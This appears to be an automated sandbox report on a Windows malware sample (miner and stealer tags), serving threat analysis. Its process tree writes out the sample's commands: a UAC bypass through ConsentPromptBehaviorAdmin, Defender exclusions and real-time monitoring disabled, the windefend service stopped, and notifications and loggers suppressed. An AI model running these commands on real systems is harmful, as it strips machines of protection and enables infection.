Analysis

  • max time kernel
    150s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/03/2025, 16:42

General

  • Target

    2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe

  • Size

    15.7MB

  • MD5

    bac9ac1ac04e6924c24c39be9ffff843

  • SHA1

    8fa5b362a62214dcf8ffd638e203c4d80d3d69af

  • SHA256

    e16d6d00f16967e549e742e67b355d725641269b6cd6fd6a6e687046ab220e75

  • SHA512

    036f144e7d364d00361353aea19fe1c6504b0ea89ce7db3c363b78a88cd756e5bca91b2d27583aff2ff019d9817016deed4d214317e55e9697890db60d81f679

  • SSDEEP

    196608:5AdCNbhcF1WKW6whfOjGvAWHMMH1OAY8PyedZLOOW7j7XlivZqOXmtubmxl5pprz:5AdghcflGvF0t7iZqptmmH5Hn

Malware Config

Signatures

  • Contains code to disable Windows Defender 3 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Disables service(s) 3 TTPs
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 28 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 2 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 16 IoCs
  • Modifies security service 2 TTPs 4 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • XMRig Miner payload 3 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 32 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
  • Modifies Windows Firewall 2 TTPs 18 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 2 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Modifies Security services 2 TTPs 20 IoCs

    Modifies the startup behavior of a security service.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Drops file in System32 directory 6 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 12 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 7 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 11 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 12 IoCs
  • Kills process with WMI 11 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 7 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5524
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Start.cmd" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1112
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Start.cmd"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3828
        • C:\Windows\SysWOW64\wscript.exe
          C:\Windows\System32\WScript.exe "C:\Users\Public\testvb1.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4412
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Public\ & copy /v /b /y C:\Users\Public\testvb1.vbs C:\Users\Public\testvb2.vbs
            5⤵
              PID:4572
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\Start.cmd"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4428
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Start2.cmd' -windowstyle hidden"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4320
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Start2.cmd" "
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3612
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\Start2.cmd"
                6⤵
                  PID:6076
                • C:\Windows\SysWOW64\reg.exe
                  C:\Windows\System32\reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"
                  6⤵
                    PID:1156
                  • C:\Windows\SysWOW64\find.exe
                    C:\Windows\System32\find.exe "0x0"
                    6⤵
                      PID:6024
                    • C:\Windows\SysWOW64\reg.exe
                      C:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows"
                      6⤵
                        PID:5992
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\uac.cmd' -windowstyle hidden"
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:5592
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uac.cmd" "
                          7⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1148
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" -Command "Start-Process cmd -ArgumentList '/c "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0' -Verb RunAs -Wait -windowstyle hidden"
                            8⤵
                            • Command and Scripting Interpreter: PowerShell
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2604
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
                              9⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2184
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
                                10⤵
                                • UAC bypass
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4060
                      • C:\Windows\SysWOW64\PING.EXE
                        C:\Windows\System32\ping.exe 192.168.1.1 -n 3
                        6⤵
                        • System Location Discovery: System Language Discovery
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:3140
                      • C:\Windows\SysWOW64\reg.exe
                        C:\Windows\System32\reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"
                        6⤵
                          PID:3680
                        • C:\Windows\SysWOW64\find.exe
                          C:\Windows\System32\find.exe "0x0"
                          6⤵
                            PID:1964
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "& {Get-Content -Path "'C:\Users\Admin\AppData\Local\Temp\NhStart3.cmd'" | Out-File -FilePath "'C:\Users\Admin\AppData\Local\Temp\Start3.cmd'" -Encoding ascii}" -Wait
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:664
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Start3.cmd' -verb runas -windowstyle hidden"
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • System Location Discovery: System Language Discovery
                            • Modifies registry class
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1608
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Start3.cmd"
                              7⤵
                              • Drops file in System32 directory
                              PID:5668
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\stwinvr.cmd' -verb runas -windowstyle hidden"
                                8⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Modifies registry class
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:848
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\stwinvr.cmd"
                                  9⤵
                                    PID:5532
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension bat
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2720
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command Set-MpPreference -MAPSReporting Disable
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4628
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4404
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -PUAProtection disable
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1496
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -ScanScheduleDay "8"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2452
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -HighThreatDefaultAction "9"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:660
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -ModerateThreatDefaultAction "9"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6124
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -LowThreatDefaultAction "9"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5540
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -SevereThreatDefaultAction "9"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2096
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5860
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:700
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1112
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\SysWOW64\en"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4624
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Public"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5840
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\L2cache"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:60
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1716
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Tfile"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4804
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Tweaker"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2940
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension cmd
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4468
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension exe
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2936
                                • C:\Windows\SysWOW64\net.exe
                                  C:\Windows\System32\NET.exe stop windefend
                                  8⤵
                                    PID:5380
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop windefend
                                      9⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5608
                                  • C:\Windows\SysWOW64\sc.exe
                                    C:\Windows\System32\SC.exe config windefend start=disabled
                                    8⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:1084
                                  • C:\Windows\SysWOW64\reg.exe
                                    C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f /reg:64
                                    8⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1500
                                  • C:\Windows\SysWOW64\reg.exe
                                    C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                    8⤵
                                      PID:5156
                                    • C:\Windows\SysWOW64\reg.exe
                                      C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v TeamViewer /f
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:828
                                    • C:\Windows\SysWOW64\reg.exe
                                      C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v TeamViewer /f
                                      8⤵
                                        PID:4716
                                      • C:\Windows\SysWOW64\reg.exe
                                        C:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
                                        8⤵
                                          PID:4292
                                        • C:\Windows\SysWOW64\reg.exe
                                          C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /f
                                          8⤵
                                            PID:3912
                                          • C:\Windows\SysWOW64\reg.exe
                                            C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d "0" /f
                                            8⤵
                                              PID:3980
                                            • C:\Windows\SysWOW64\reg.exe
                                              C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f /reg:64
                                              8⤵
                                                PID:4564
                                              • C:\Windows\SysWOW64\reg.exe
                                                C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Windows" /v NoInteractiveServices /t REG_DWORD /d "1" /f
                                                8⤵
                                                  PID:3156
                                                • C:\Windows\SysWOW64\reg.exe
                                                  C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f
                                                  8⤵
                                                    PID:624
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "DontShowUI" /t REG_DWORD /d "1" /f
                                                    8⤵
                                                      PID:4444
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f /reg:64
                                                      8⤵
                                                        PID:2604
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                        8⤵
                                                          PID:2888
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f /reg:64
                                                          8⤵
                                                            PID:696
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                            8⤵
                                                              PID:1964
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              C:\Windows\System32\reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f /reg:64
                                                              8⤵
                                                                PID:3732
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                C:\Windows\System32\reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                8⤵
                                                                  PID:1728
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f /reg:64
                                                                  8⤵
                                                                    PID:2396
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
                                                                    8⤵
                                                                      PID:5760
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d "00000001" /f /reg:64
                                                                      8⤵
                                                                        PID:5824
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "00000001" /f /reg:64
                                                                        8⤵
                                                                        • Modifies Windows Defender notification settings
                                                                        PID:864
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_SZ /f /reg:64
                                                                        8⤵
                                                                        • Modifies Windows Defender notification settings
                                                                        PID:5620
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "00000001" /f
                                                                        8⤵
                                                                        • Modifies Windows Defender notification settings
                                                                        PID:1904
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_SZ /f
                                                                        8⤵
                                                                        • Modifies Windows Defender notification settings
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4256
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f /reg:64
                                                                        8⤵
                                                                        • Modifies Windows Defender notification settings
                                                                        PID:4752
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f /reg:64
                                                                        8⤵
                                                                        • Modifies Windows Defender notification settings
                                                                        PID:1652
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f
                                                                        8⤵
                                                                        • Modifies Windows Defender notification settings
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3416
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f
                                                                        8⤵
                                                                        • Modifies Windows Defender notification settings
                                                                        PID:4980
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f /reg:64
                                                                        8⤵
                                                                          PID:3968
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                          8⤵
                                                                            PID:512
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f /reg:64
                                                                            8⤵
                                                                              PID:1708
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                              8⤵
                                                                                PID:3372
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f /reg:64
                                                                                8⤵
                                                                                  PID:3316
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                  8⤵
                                                                                    PID:5936
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "NoActionNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:64
                                                                                    8⤵
